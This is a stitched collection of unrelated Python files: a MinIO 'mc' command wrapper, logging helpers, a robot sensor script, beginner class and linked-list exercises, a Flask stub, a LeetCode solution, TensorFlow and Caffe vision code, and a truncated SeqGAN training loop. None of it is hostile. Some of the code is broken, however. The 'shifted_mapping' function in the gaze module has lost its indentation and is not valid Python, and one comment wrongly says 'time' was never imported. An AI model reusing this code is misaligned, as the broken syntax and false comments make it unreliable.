    return creation_result[0].get('status') == SUCCESS
def execute_command(
        endpoint_alias: str,
        command: str,
        arguments: typing.Optional[str] = None,
        minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
):
    """Run a non-admin ``mc`` command and return its parsed JSON records.

    The target is built as ``<alias>/<arguments>`` (mc's remote-path
    syntax).  Raises subprocess.CalledProcessError on a non-zero exit,
    echoing both stdout and stderr first.  (Previously stderr was silently
    dropped here, unlike in execute_admin_command.)
    """
    full_command = (
        f'mc --config-dir {minio_client_config_dir} --json {command} '
        f'{"/".join((endpoint_alias, arguments or ""))}'
    )
    typer.echo(full_command)
    parsed_command = shlex.split(full_command)
    completed = subprocess.run(
        parsed_command,
        capture_output=True
    )
    try:
        completed.check_returncode()
    except subprocess.CalledProcessError:
        typer.echo(completed.stdout)
        typer.echo(completed.stderr)  # consistency with execute_admin_command
        raise
    result = [json.loads(line) for line in completed.stdout.splitlines()]
    return result
def execute_admin_command(
        endpoint_alias: str,
        command: str,
        arguments: typing.Optional[str] = None,
        minio_client_config_dir: typing.Optional[Path] = DEFAULT_CONFIG_DIR
) -> typing.List:
    """Uses the ``mc`` binary to perform admin tasks on minIO servers"""
    full_command = (
        f'mc --config-dir {minio_client_config_dir} --json admin {command} '
        f'{endpoint_alias} {arguments or ""}'
    )
    completed = subprocess.run(
        shlex.split(full_command),
        capture_output=True
    )
    if completed.returncode != 0:
        # Surface mc's output before propagating the failure.
        typer.echo(completed.stdout)
        typer.echo(completed.stderr)
        completed.check_returncode()  # raises CalledProcessError
    # mc emits one JSON document per line.
    return [json.loads(line) for line in completed.stdout.splitlines()]
if __name__ == '__main__':
    # Allow running this module directly as a CLI script.
    app()
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import sys
import threading
import time
# Module-level switch consulted by LogTrace() before emitting output.
gEnableTracing = False

def SetTracingEnabled(isEnabled):
    # Enable or disable TRACE output process-wide.
    global gEnableTracing
    gEnableTracing = isEnabled
def LogTrace(string):
    """Write a timestamped TRACE line to stdout when tracing is enabled."""
    global gEnableTracing
    if gEnableTracing:
        threadName = threading.current_thread().name.ljust(12)
        # sys.stdout.write works under both Python 2 and 3; the original
        # 'print >> sys.stdout' statement is a syntax error on Python 3.
        sys.stdout.write(time.asctime() + " " + threadName + " TRACE " + string + "\n")
def LogError(string):
    """Write a timestamped ERROR line (with thread name) to stderr."""
    threadName = threading.current_thread().name.ljust(12)
    # sys.stderr.write is portable; the original 'print >> sys.stderr'
    # statement is a syntax error on Python 3.
    sys.stderr.write(time.asctime() + " " + threadName + " ERROR " + string + "\n")
def LogMessage(string):
    """Write a timestamped plain log line (with thread name) to stdout."""
    threadName = threading.current_thread().name.ljust(12)
    # sys.stdout.write is portable; the original 'print >> sys.stdout'
    # statement is a syntax error on Python 3.
    sys.stdout.write(time.asctime() + " " + threadName + " " + string + "\n")
|
from .. import sensors
from ..components.headlight import Headlight
from signal import pause
from time import sleep
s = sensors.UltrasonicSensor()
led = Headlight()

# Poll the ultrasonic sensor until something comes into range, printing
# close-by distances along the way, then leave the loop.
while True:
    if s.distance < 1:
        print(s.distance)
    if s.in_range:
        # NOTE(review): assumes the sensor object exposes next_turn() --
        # confirm against the sensors module.
        print(s.next_turn())
        break
    sleep(0.3)
def on():
    # Event callback: switch the headlight LED on.
    led.on()
def off():
    # Event callback: switch the headlight LED off.
    led.off()
# NOTE: once these event handlers are bound, polling `distance` and
# `in_range` above stops working (per the original author's observation).
s.when_in_range = on
s.when_out_of_range = off

pause()
|
import os
import glob
import logging
from logging.handlers import RotatingFileHandler
LOG_FILENAME = 'logging_rotatingfile_example.out'

# Dedicated logger writing to tiny rotating files: maxBytes=10 means every
# record forces a rollover, and backupCount=2 keeps two numbered backups.
my_logger = logging.getLogger('MyLogger')
my_logger.setLevel(logging.DEBUG)

handler = RotatingFileHandler(LOG_FILENAME, maxBytes=10, backupCount=2)
handler.setLevel(logging.DEBUG)
handler.setFormatter(logging.Formatter(
    "[%(asctime)s] {%(pathname)s:%(lineno)d %(levelname)s - %(message)s}"))
my_logger.addHandler(handler)

# Emit 20 records; only the newest few survive the rotation.
for i in range(20):
    my_logger.debug('i = %d' % i)

# Show which files the rotation produced (base file + numbered backups).
logfiles = glob.glob(LOG_FILENAME + '*')
for f in logfiles:
    print(f)
|
#import module
import math
'''
Collection of some small practice questions
Create a Cricle class and intialize it with radius. Make two methods getArea and getCircumference inside this class.
'''
class circle():
    """A circle defined by its radius (practice exercise).

    Uses math.pi rather than the hard-coded 3.14 of the original; the file
    imports math but never used it, which suggests this was the intent.
    """

    def __init__(self, radius):
        self.radius = radius

    def getArea(self):
        """Return the area, pi * r**2."""
        return math.pi * (self.radius * self.radius)

    def getCircumference(self):
        """Return the circumference, 2 * pi * r."""
        return math.pi * self.radius * 2
# Demo: a circle of radius 5.
Circle = circle(5)
print(Circle.getArea())
print('%.2f'%Circle.getCircumference())  #limit decimal places by '%.2f'%value
print("\n\n\n")
'''
Create a Temprature class. Make two methods :
1. convertFahrenheit - It will take celsius and will print it into Fahrenheit.
2. convertCelsius - It will take Fahrenheit and will convert it into Celsius.
'''
#we do not need a constructor for this class
class Temperature():
    """Celsius/Fahrenheit conversions (practice exercise; no state needed)."""

    def convertFahrenheit(self, celsius):
        """Return *celsius* converted to degrees Fahrenheit."""
        return (celsius * 1.8) + 32

    def convertCelcius(self, fahrenheit):
        """Return *fahrenheit* converted to degrees Celsius.

        The misspelled name is kept for backward compatibility with
        existing callers; prefer convertCelsius.
        """
        return (fahrenheit - 32) / 1.8

    # Correctly spelled alias for new callers.
    convertCelsius = convertCelcius
# Demo: 20 C -> F and 68 F -> C with the same Temperature instance.
myTemp = Temperature()
cTemp = 20
fTemp = 68
# NOTE: the misspelled labels below are runtime strings, left as-is.
print("farhenheit",myTemp.convertFahrenheit(cTemp))
print("celcius", myTemp.convertCelcius(fTemp))
print('\n\n\n')
'''
Create a Student class and initialize it with name and roll number. Make methods to :
1. Display - It should display all informations of the student.
2. setAge - It should assign age to student
3. setMarks - It should assign marks to the student.
'''
class Student():
    """A student record: name, roll number, plus optional age and marks."""

    def __init__(self, name, roll_number):
        self.name = name
        self.roll_number = roll_number
        self.Age = None    # filled in later via setAge
        self.Marks = None  # filled in later via setMarks

    def Display(self,):
        """Print everything known about the student."""
        print("\nRoll Number : ", self.roll_number,
              "\nName : ", self.name,
              "\nAge : ", self.Age,
              "\nMarks : ", self.Marks)

    def setAge(self, Age):
        """Record the student's age."""
        self.Age = Age

    def setMarks(self, Marks):
        """Record the student's marks."""
        self.Marks = Marks
# Demo: display before and after filling in age and marks.
Mauricio = Student("Mauricio",8)
Mauricio.Display()
Mauricio.setAge(24)
Mauricio.setMarks(4.0)
Mauricio.Display()
print("\n\n\n")
"""
Question:
Define a class, which have a class parameter and have a same instance parameter.
"""
class Person:
    """Demonstrates a class attribute shadowed by an instance attribute."""

    name = "Person"  # class-level value, reachable as Person.name

    def __init__(self, name=None):
        # The instance attribute shadows the class attribute, even when
        # the argument is left at its None default.
        self.name = name
# The class attribute Person.name stays "Person"; instances shadow it.
jeffrey = Person("Jeffrey")
print ("%s name is %s" %(Person.name, jeffrey.name))
nico = Person()
nico.name = "Nico"  # assign the instance attribute directly
print ("%s name is %s" % (Person.name, nico.name))
print("\n\n\n")
"""
Question:
Define a class named American and its subclass NewYorker.
"""
class American(object):
    """Empty base class for the inheritance exercise."""
class NewYorker(American):
    """American subclass adding no behavior of its own."""
# Instances print with the default repr (class name plus address).
anAmerican = American()
aNewYorker = NewYorker()
print (anAmerican)
print (aNewYorker)
print("\n\n\n")
"""
Write a Python program to create a singly linked list, append some items and iterate through the list.
extra material, finish the linked list with all useful functions
"""
#remember for lists we create both the node class and the list class
class Node:
    """One element of a singly linked list: a payload plus a next pointer."""

    def __init__(self, data=None):
        self.data = data  # payload
        self.next = None  # following node, or None at the tail
class singly_linked_list:
    """Singly linked list built on Node, with an always-empty sentinel head.

    NOTE(review): get()/erase() treat positions as 1-based (see the demo
    usage below); several quirks are flagged inline.
    """

    def __init__(self):
        #create an empty list
        self.tail = None
        self.head = Node()  #in this model our head will always be empty (not sure if i like it)
        self.count = 0  # NOTE(review): never updated; length() recounts instead

    def append(self, data):  #add a node
        # Walk to the last node, link the new one, and record it as tail.
        new_node = Node(data)
        cur = self.head
        while cur.next != None:  #if next is empty, we will add new node to end
            cur = cur.next
        cur.next = new_node
        self.tail = new_node  #the node we just appended becomes the tail

    def length(self):
        # Count real nodes; the sentinel head is excluded.
        cur = self.head
        total = 0
        while cur.next != None:
            cur = cur.next
            total += 1
        return total

    def display(self):
        # Collect payloads into a Python list and print it.
        linkedlist = []
        cur = self.head
        while cur.next != None:
            cur = cur.next  #we go to next because our head is empty
            linkedlist.append(cur.data)  #then we add data to list
        print(linkedlist)

    def get(self, index):
        # Return the payload at 1-based *index*.
        # NOTE(review): the loop exits (returning None) before it can match
        # the LAST element (index == length()), and get(0) returns the
        # sentinel's None -- looks like an off-by-one; confirm intended.
        count = 0
        cur = self.head
        if index <= self.length():
            while cur.next != None:
                if index == count:
                    return cur.data
                else:
                    cur = cur.next
                    count +=1
        else:
            print("ERROR: index out of bounds")
            return

    def erase(self, index):
        # Unlink the node at 1-based *index*.
        # NOTE(review): despite the guard, erase(0) never matches (count
        # starts at 1) and walks off the end of the chain -- confirm callers
        # only pass 1..length()-1.
        if index >= self.length() or index < 0:
            print("ERROR: index out of range")
            return
        count = 1
        cur = self.head
        while True:
            last = cur
            cur = cur.next  #cur is the candidate; last is the node before it
            if count == index:
                last.next = cur.next  #bypass cur so the chain stays intact
                return  #that way we take out the middle node without breaking the chain
            count += 1

    def iterate(self):  #yield each node's payload in order
        cur = self.head
        while cur.next != None:
            cur = cur.next
            yield cur.data
        return
# Exercise the list: append, display, length, 1-based get, iterate, erase.
linkedlist = singly_linked_list()
linkedlist.append('apple')
linkedlist.display()
linkedlist.append("banana")
linkedlist.append("melon")
linkedlist.append("strawberry")
linkedlist.append("pear")
linkedlist.append("mango")
linkedlist.display()
print(linkedlist.length())
print(linkedlist.get(3))  #with this system, third item is 1,2,3 not 0,1,2
for val in linkedlist.iterate():
    print(val)
print("\n")
linkedlist.erase(2)
linkedlist.display()
print('\n')
'''
Cloud pathing problem.
find the shortest path. you can hop on 0, not on 1
you can either advance 1 or 2 spots.
'''
# Greedy walk over the clouds: always try a 2-jump first (if the landing
# cloud isn't thunder, i.e. != 1), otherwise take a 1-jump.
count = 0
jumps = 0
c = [0,1,0,0,1,0,0,1,0]
while count < len(c) - 1:  # we assume the last cloud can't be thunder
    if count < (len(c) - 2) and c[(count + 2)] != 1:
        jumps += 1
        count += 2
    else:
        jumps += 1
        count += 1
print(jumps)
print('\n\n')

# Count occurrences of 'a' in a small string.
s = "abcda"
count = s.count('a')
print(count)
def countTriplets(arr, r):
    """Count index triples (i, j, k) with i < j < k, arr[j] == arr[i] * r
    and arr[k] == arr[j] * r (HackerRank "Count Triplets").

    Fixes the original, which for r != 1 multiplied whole-array value
    frequencies and therefore ignored index order (e.g. [4, 2, 8] with
    r=2 returned 1 instead of 0); it also hid errors behind a bare
    ``except``.

    Runs in O(n): for each middle element j, multiply how many arr[j]/r
    occur to its left by how many arr[j]*r remain to its right.
    """
    left = {}   # value -> occurrences strictly before the current j
    right = {}  # value -> occurrences at or after the current j
    for value in arr:
        right[value] = right.get(value, 0) + 1

    count = 0
    for value in arr:
        right[value] -= 1  # 'value' is now the middle element j
        if value % r == 0:
            count += left.get(value // r, 0) * right.get(value * r, 0)
        left[value] = left.get(value, 0) + 1
    return count
from flask import Flask,jsonify,request
app = Flask(__name__)
@app.route('/person/<person_id>')
def person(person_id):
    """Return a JSON greeting echoing the requested person id."""
    return jsonify({'hello': person_id})
if __name__ == '__main__':
    # Run the Flask development server when executed directly.
    app.run()
|
class Solution:
    """LeetCode 122: Best Time to Buy and Sell Stock II."""

    def maxProfit(self, prices: list) -> int:
        """Return the maximum profit with unlimited buy/sell transactions.

        Equivalent to collecting every positive day-over-day price gain.
        Fixes two defects in the original: a NameError on an empty price
        list (it returned dp[i] with i unbound after a zero-iteration
        loop) and a leftover debug print inside the loop.
        """
        if not prices:
            return 0
        return sum(b - a for a, b in zip(prices, prices[1:]) if b > a)
if __name__ == '__main__':
    # Quick manual checks.
    obj = Solution()
    print(obj.maxProfit([7, 1, 5, 3, 6, 4]))  # expect 7
    print(obj.maxProfit([1,2,3,4,5]))         # expect 4
    print(obj.maxProfit([7,6,4,3,1]))         # expect 0
# -*- coding: UTF-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import seq_LSTM_filter as slf
from tensorflow.python.framework import ops
ops.reset_default_graph()  # start from a clean TF1 graph

# parameters
INPUT_LENGTH = 1  # the input data length at one time
if __name__ == '__main__':
    # Generate the data set: y_orig is the clean signal, y_awgn the same
    # signal with additive white Gaussian noise.
    y_orig, y_awgn = slf.signal(standard_deviation=0.3, signal_type='sin')
    training_size = int(slf.SIGNAL_LENGTH * slf.TRAINING_SET_RATIO)
    test_size = slf.SIGNAL_LENGTH - training_size

    # Inputs are the noisy samples; targets are the clean ones.
    # x_training = (y_awgn[0: training_size]).reshape(training_size, INPUT_LENGTH, -1)
    # x_test = (y_awgn[training_size: slf.SIGNAL_LENGTH]).reshape(test_size, INPUT_LENGTH, -1)
    x_training = (y_awgn[0: training_size]).reshape(training_size, INPUT_LENGTH, -1)
    x_test = (y_awgn[training_size: slf.SIGNAL_LENGTH]).reshape(test_size, INPUT_LENGTH, -1)
    y_training = (y_orig[0: training_size]).reshape(training_size, -1)
    y_test = (y_orig[training_size: slf.SIGNAL_LENGTH]).reshape(test_size, -1)

    a = tf.nn.tanh  # activation used by every layer below

    # starts a session (TF1 graph mode)
    sess = tf.Session()

    # input placeholders
    X = tf.placeholder(dtype=tf.float32, shape=[None, INPUT_LENGTH, slf.DATA_DIM])
    Y = tf.placeholder(dtype=tf.float32, shape=[None, slf.DATA_DIM])

    # two hidden layers
    layer_1 = slf.nn_single_layer(X, slf.DATA_DIM, slf.HIDDEN_SIZE, activation_function=a)
    layer_2 = slf.nn_single_layer(layer_1, slf.HIDDEN_SIZE, slf.HIDDEN_SIZE, activation_function=a)

    # output layer, flattened to (batch, DATA_DIM)
    y = slf.nn_single_layer(layer_2, slf.HIDDEN_SIZE, slf.DATA_DIM, activation_function=a)
    y = tf.reshape(y, [-1, slf.DATA_DIM])

    # calculates the mean-squared loss
    loss = tf.reduce_mean(tf.reduce_sum(tf.square(y - Y), reduction_indices=[1]))

    # optimizer and variable initialization
    train_op = tf.train.GradientDescentOptimizer(slf.LEARNING_RATE).minimize(loss)
    init = tf.global_variables_initializer()
    sess.run(init)

    # trains the model
    for k in range(0, slf.TRAINING_ITER):
        _, loss_training = sess.run([train_op, loss], feed_dict={X: x_training, Y: y_training})
        # Report training/test loss ten times over the whole run.
        if k%(slf.TRAINING_ITER/10) == 0:
            y_out = sess.run(y, feed_dict={X: x_test})
            # NOTE(review): loss_test is a numpy array (RMSE per output dim);
            # the '%f' below assumes DATA_DIM == 1 -- confirm.
            loss_test = np.sqrt(((y_out - y_test) ** 2).mean(axis=0))
            print("After %d iterations, loss on the training set: %f, on the test set: %f" % (k, loss_training, loss_test))

    # Plot the noisy input, clean signal and filtered output on the test span.
    y_in = y_awgn[training_size: slf.SIGNAL_LENGTH]
    y_sig = y_orig[training_size: slf.SIGNAL_LENGTH]
    plt.figure(1)
    l_out, = plt.plot(y_out, label='output')
    l_in, = plt.plot(y_in, label='input')
    l_sig, = plt.plot(y_sig, label='signal')
    plt.legend(handles = [l_out, l_in, l_sig])
    plt.xlabel('Time')
    plt.ylabel('Amplitude')
    plt.title('The input signal with AWGN and filtered waveform by the NN model')
    plt.show()
|
import numpy as np
import time
from skimage.io import imread
import matplotlib.pyplot as plt
import scipy.io as sio
from scipy.misc import imresize
from matplotlib.patches import Circle
import sys
sys.path.append('/home/pieter/projects/caffe/python')
import caffe
def loadModel():
    """Load the gaze-following Caffe network in TEST phase."""
    prototxt = '/home/pieter/projects/engagement-l2tor/data/model/deploy_demo.prototxt'
    weights = '/home/pieter/projects/engagement-l2tor/data/model/binary_w.caffemodel'
    return caffe.Net(prototxt, weights, caffe.TEST)
def prepImages(img, e):
    """Load an image and build the three inputs for the gaze network.

    Output images of prepImages are exactly the same as the matlab ones.

    Keyword Arguments:
    img -- path of the image with the subject (passed to skimage's imread)
    e -- head location in relative coordinates [x, y]

    Returns (original image, full-image blob, head-crop blob, eye grid).
    """
    input_shape = [227, 227]  # network input resolution
    alpha = 0.3               # head-crop size as a fraction of the image

    img = imread(img)
    img_resize = None

    #height, width
    #crop of face (input 2)
    wy = int(alpha * img.shape[0])
    wx = int(alpha * img.shape[1])
    center = [int(e[0]*img.shape[1]), int(e[1]*img.shape[0])]
    # The -1 offsets appear to compensate for MATLAB's 1-based indexing
    # (per the docstring's parity claim) -- confirm.
    y1 = int(center[1]-.5*wy) - 1
    y2 = int(center[1]+.5*wy) - 1
    x1 = int(center[0]-.5*wx) - 1
    x2 = int(center[0]+.5*wx) - 1
    # NOTE(review): no clamping -- a head near the image border can yield
    # negative indices and an empty/wrapped crop; confirm inputs keep the
    # crop inside the image.

    #make crop of face from image
    im_face = img[y1:y2, x1:x2, :]

    #subtract mean from images
    places_mean = sio.loadmat('data/model/places_mean_resize.mat')
    imagenet_mean = sio.loadmat('data/model/imagenet_mean_resize.mat')
    places_mean = places_mean['image_mean']
    imagenet_mean = imagenet_mean['image_mean']

    #resize image, swap RGB -> BGR for Caffe, subtract the dataset mean
    img_resize = imresize(img, input_shape, interp='bicubic')
    img_resize = img_resize.astype('float32')
    img_resize = img_resize[:,:,[2,1,0]] - places_mean
    img_resize = np.rot90(np.fliplr(img_resize))

    #resize eye image, same channel swap and mean subtraction
    eye_image = imresize(im_face, input_shape, interp='bicubic')
    eye_image = eye_image.astype('float32')
    eye_image_resize = eye_image[:,:,[2,1,0]] - imagenet_mean
    eye_image_resize = np.rot90(np.fliplr(eye_image_resize))

    #get everything in the right input format for the network
    img_resize, eye_image_resize = fit_shape_of_inputs(img_resize, eye_image_resize)
    z = eyeGrid(img, [x1, x2, y1, y2])
    z = z.astype('float32')
    return img, img_resize, eye_image_resize, z
def fit_shape_of_inputs(img_resize, eye_image_resize):
    """Convert two HxWxC arrays to the 1xCxHxW layout the network expects."""
    def to_net_layout(arr):
        # append a singleton batch axis, then reorder to (batch, channel, h, w)
        expanded = arr.reshape([arr.shape[0], arr.shape[1], arr.shape[2], 1])
        return expanded.transpose(3, 2, 0, 1)
    return to_net_layout(img_resize), to_net_layout(eye_image_resize)
def eyeGrid(img, headlocs):
    """Encode the head-crop centre as a one-hot 13x13 grid, flattened to NCHW.
    Keyword Arguments:
    img -- original image (only its height/width are used)
    headlocs -- crop bounds [x1, x2, y1, y2] in pixels
    """
    height = img.shape[0]
    width = img.shape[1]
    # normalised centre of the crop
    cx = (headlocs[0] / width + headlocs[1] / width) * 0.5
    cy = (headlocs[2] / height + headlocs[3] / height) * 0.5
    col = np.floor(cx * 12).astype('int')
    row = np.floor(cy * 12).astype('int')
    grid = np.zeros([13, 13]).astype('int')
    grid[row, col] = 1
    flat = grid.flatten()
    return flat.reshape(1, len(flat), 1, 1)
def predictGaze(network, image, head_image, head_loc):
    """Fill the three input blobs and run a single forward pass."""
    blobs = network.blobs
    blobs['data'].data[...] = image
    blobs['face'].data[...] = head_image
    blobs['eyes_grid'].data[...] = head_loc
    return network.forward()
def postProcessing(f_val):
    """Combine the 5 shifted 5x5 output grids into one 227x227 heatmap and
    return (heatmap, [x_predict, y_predict]) with predictions in [0, 1].
    Keyword arguments:
    f_val -- output of the Caffe model (one blob per spatial shift)
    """
    # One fully-connected output per shift: (0,0), (1,0), (-1,0), (0,1), (0,-1).
    fc_0_0 = f_val['fc_0_0'].T
    # BUG FIX: 'fc_0_1' was read twice here; the (1,0)-shift grid is 'fc_1_0'.
    fc_1_0 = f_val['fc_1_0'].T
    fc_m1_0 = f_val['fc_m1_0'].T
    fc_0_1 = f_val['fc_0_1'].T
    fc_0_m1 = f_val['fc_0_m1'].T
    f_0_0 = np.reshape(fc_0_0, (5,5))
    f_1_0 = np.reshape(fc_1_0, (5,5))
    f_m1_0 = np.reshape(fc_m1_0, (5,5))
    f_0_1 = np.reshape(fc_0_1, (5,5))
    f_0_m1 = np.reshape(fc_0_m1, (5,5))
    gaze_grid_list = [alpha_exponentiate(f_0_0), \
                      alpha_exponentiate(f_1_0), \
                      alpha_exponentiate(f_m1_0), \
                      alpha_exponentiate(f_0_1), \
                      alpha_exponentiate(f_0_m1)]
    shifted_x = [0, 1, -1, 0, 0]
    shifted_y = [0, 0, 0, -1, 1]
    count_map = np.ones([15, 15])
    average_map = np.zeros([15, 15])
    # Spread every 5x5 cell over the 15x15 map region it covers, per shift.
    for delta_x, delta_y, gaze_grids in zip(shifted_x, shifted_y, gaze_grid_list):
        for x in range(0, 5):
            for y in range(0, 5):
                ix = shifted_mapping(x, delta_x, True)
                iy = shifted_mapping(y, delta_y, True)
                fx = shifted_mapping(x, delta_x, False)
                fy = shifted_mapping(y, delta_y, False)
                average_map[ix:fx+1, iy:fy+1] += gaze_grids[x, y]
                count_map[ix:fx+1, iy:fy+1] += 1
    average_map = average_map / count_map
    final_map = imresize(average_map, (227,227), interp='bicubic')
    # arg-max of the upsampled heatmap gives the predicted gaze pixel
    idx = np.argmax(final_map.flatten())
    [rows, cols] = ind2sub2((227, 227), idx)
    y_predict = rows/227
    x_predict = cols/227
    return final_map, [x_predict, y_predict]
def alpha_exponentiate(x, alpha=0.3):
    """Softmax-style normalisation: exp(alpha*x) divided by its total sum."""
    scaled = np.exp(alpha * x)
    return scaled / np.sum(scaled.flatten())
def ind2sub2(array_shape, ind):
    """Python implementation of the equivalent matlab method.
    NOTE: row uses true division, so it can be fractional.
    """
    n_cols = array_shape[1]
    return [ind / n_cols, ind % n_cols]
def shifted_mapping(x, delta_x, is_topleft_corner):
if is_topleft_corner:
if x == 0:
return 0
ix = 0 + 3 * x - delta_x
return max(ix, 0)
else:
if x == 4:
return 14
ix = 3 * (x + 1) - 1 - delta_x
return min(14, ix)
def getGaze(e, image):
    """Calculate the gaze direction in an image.
    Keyword arguments:
    e -- list with x,y location of head (relative coordinates)
    image -- path to the original image
    Returns [x, y] gaze target in pixel coordinates.
    """
    network = loadModel()
    image, image_resize, head_image, head_loc = prepImages(image, e)
    f_val = predictGaze(network, image_resize, head_image, head_loc)
    final_map, predictions = postProcessing(f_val)
    # NOTE(review): predictions is [x, y] but shape[0] is the image HEIGHT and
    # shape[1] the WIDTH — these scalings look swapped; confirm against callers.
    x = predictions[0] * np.shape(image)[0]
    y = predictions[1] * np.shape(image)[1]
    x = int(x)
    y = int(y)
    return [x,y]
if __name__=="__main__":
    #this main method is for testing purposes
    import time  # BUG FIX: `time` was used below but never imported
    from scipy.misc import imread  # imread was likewise missing at module level

    start = time.time()
    #predictions = getGaze([0.60, 0.2679], 'script/test.jpg')
    predictions = getGaze([0.54, 0.28], 'script/5.jpg')
    image = imread('script/5.jpg')
    # was `fig, ax = fig,ax = plt.subplots(1)` — a redundant double assignment
    fig, ax = plt.subplots(1)
    ax.set_aspect('equal')
    plt.imshow(image)
    ax.add_patch(Circle((predictions[0], predictions[1]),10))
    plt.show()
|
import numpy as np
import tensorflow as tf
# import random
from dataloader import Gen_Data_loader, Dis_dataloader
# from generator import Generator
from two_layer_generator import Generator2
from rnn_discriminator import RNNDiscriminator2
from rollout import ROLLOUT
import os
from config import *
def generate_samples(sess, trainable_model, batch_size, generated_num, output_file):
    """Sample `generated_num` sequences from the model and write them to
    `output_file`, one space-separated sequence per line."""
    samples = []
    n_batches = int(generated_num / batch_size)
    for _ in range(n_batches):
        samples.extend(trainable_model.generate(sess))
    lines = (' '.join(str(token) for token in poem) + '\n' for poem in samples)
    with open(output_file, 'w') as fout:
        fout.writelines(lines)
def target_loss(sess, gen_lstm, data_loader):
    """Mean pretrain (oracle NLL) loss of `gen_lstm` over all batches.
    See Section 4 in https://arxiv.org/abs/1609.05473 for the metric."""
    losses = []
    data_loader.reset_pointer()
    for _ in xrange(data_loader.num_batch):
        batch = data_loader.next_batch()
        losses.append(sess.run(gen_lstm.pretrain_loss, {gen_lstm.x: batch}))
    return np.mean(losses)
def pre_train_epoch(sess, trainable_model, data_loader):
    """Run one epoch of MLE pre-training; return the mean supervised loss."""
    losses = []
    data_loader.reset_pointer()
    for _ in xrange(data_loader.num_batch):
        batch = data_loader.next_batch()
        _, g_loss = trainable_model.pretrain_step(sess, batch)
        losses.append(g_loss)
    return np.mean(losses)
def main():
    """Full SeqGAN-style pipeline: MLE pre-training of the generator with
    early stopping, discriminator pre-training, then adversarial training
    with policy-gradient updates guided by rollout rewards."""
    # random.seed(SEED)
    # np.random.seed(SEED)
    assert START_TOKEN == 0
    gen_data_loader = Gen_Data_loader(BATCH_SIZE)
    likelihood_data_loader = Gen_Data_loader(BATCH_SIZE)  # For testing
    dis_data_loader = Dis_dataloader(BATCH_SIZE)
    generator = Generator2(vocab_size, BATCH_SIZE, EMB_DIM, HIDDEN_DIM, SEQ_LENGTH, START_TOKEN,learning_rate=0.03)
    discriminator = RNNDiscriminator2(sequence_length=SEQ_LENGTH, nrof_class=2, vocab_size=vocab_size, emb_dim=dis_embedding_dim,
                                      batch_size = dis_batch_size,hidden_dim = 2*HIDDEN_DIM, learning_rate = 0.03)
    config = tf.ConfigProto()
    config.gpu_options.allow_growth = True
    sess = tf.Session(config=config)
    sess.run(tf.global_variables_initializer())
    # Create Saver
    saver_pretrain = tf.train.Saver(max_to_keep=10)
    saver = tf.train.Saver(max_to_keep=10)
    # Pick the first unused ./Model/model<idx>/ directory for this run.
    model_idx = 1
    fname = 'model' + str(model_idx)
    model_save_path = './Model/' + fname + '/'
    while os.path.exists(model_save_path):
        model_idx += 1
        fname = 'model' + str(model_idx)
        model_save_path = './Model/' + fname + '/'
    pre_model_save_path = './Model/' + fname + '_pre/'
    os.makedirs(model_save_path)
    os.makedirs(pre_model_save_path)
    # os.makedirs(os.path.join('./log', fname))
    pretrain_fname = fname+'_pre'
    # First, use the oracle model to provide the positive examples, which are sampled from the oracle data distribution
    gen_data_loader.create_batches(positive_file)
    # pre-train generator
    print 'Start pre-training...'
    # Sliding window of recent eval losses for early stopping / best-model save.
    early_stop_buffer = [10.]*5
    for pretrain_cnt, epoch in enumerate(xrange(PRE_EPOCH_NUM)):
        loss = pre_train_epoch(sess, generator, gen_data_loader)
        if epoch % 2 == 0:
            # generate_samples(sess, generator, BATCH_SIZE, generated_num, eval_file)
            likelihood_data_loader.create_batches(eval_real_file)
            test_loss = target_loss(sess, generator, likelihood_data_loader)
            print 'pre-train epoch ', epoch, 'test_loss ', test_loss
            early_stop_buffer = early_stop_buffer[1:]
            early_stop_buffer.append(test_loss)
            # stop when the oldest loss beats every newer one (no improvement)
            if all(early_stop_buffer[0] < np.asarray(early_stop_buffer[1:])):
                break
            elif all(early_stop_buffer[-1] < np.asarray(early_stop_buffer[:-1])):  # save on local min
                saver_pretrain.save(sess, os.path.join(pre_model_save_path, pretrain_fname), global_step=epoch, write_meta_graph=False)
                metagraph_filename = os.path.join(pre_model_save_path, pretrain_fname + '.meta')
                if not os.path.exists(metagraph_filename):
                    saver.export_meta_graph(metagraph_filename)
    # Restore the best pre-trained generator weights before adversarial phase.
    saver.restore(sess,tf.train.latest_checkpoint(pre_model_save_path))
    print 'Start pre-training discriminator...'
    # Train 1 epoch on the generated data and do this for 50 times
    for e in range(50):
        generate_samples(sess, generator, BATCH_SIZE, generated_num, negative_file)
        dis_data_loader.load_train_data(positive_file, negative_file)
        for _ in range(3):
            dis_data_loader.reset_pointer()
            for it in xrange(dis_data_loader.num_batch):
                x_batch, y_batch = dis_data_loader.next_batch()
                feed = {
                    discriminator.input_x: x_batch,
                    discriminator.input_y: y_batch
                }
                _ = sess.run(discriminator.train_op, feed)
        print 'Epoch {}'.format(e)
    # Rollout policy is a time-decayed copy of the generator (rate 0.7).
    rollout = ROLLOUT(generator, 0.7)
    print '#########################################################################'
    print 'Start Adversarial Training...'
    early_stop_buffer = [10.] * 6
    for total_batch in range(TOTAL_BATCH):
        # Train the generator for one step
        for it in range(1):
            samples = generator.generate(sess)
            rewards = rollout.get_reward(sess, samples, SAMP_NUM, discriminator)
            feed = {generator.x: samples, generator.rewards: rewards}
            _ = sess.run(generator.g_updates, feed_dict=feed)
        # Test
        if total_batch % 2 == 0 or total_batch == TOTAL_BATCH - 1:
            # generate_samples(sess, generator, BATCH_SIZE, generated_num, eval_file)
            likelihood_data_loader.create_batches(eval_real_file)
            test_loss = target_loss(sess, generator, likelihood_data_loader)
            print 'total_batch: ', total_batch, 'test_loss: ', test_loss
            # early_stop_buffer = early_stop_buffer[1:]
            # early_stop_buffer.append(test_loss)
            # if all(early_stop_buffer[0] < np.asarray(early_stop_buffer[1:])):
            #     break
            # elif all(early_stop_buffer[-1] < np.asarray(early_stop_buffer[:-1])): # save on local min
            saver.save(sess, os.path.join(model_save_path, fname), global_step=total_batch, write_meta_graph=False)
            metagraph_filename = os.path.join(model_save_path, fname + '.meta')
            if not os.path.exists(metagraph_filename):
                saver.export_meta_graph(metagraph_filename)
        # Update roll-out parameters
        rollout.update_params()
        # Train the discriminator
        for _ in range(3):
            generate_samples(sess, generator, BATCH_SIZE, generated_num, negative_file)
            dis_data_loader.load_train_data(positive_file, negative_file)
            dis_data_loader.reset_pointer()
            for it in xrange(dis_data_loader.num_batch):
                x_batch, y_batch = dis_data_loader.next_batch()
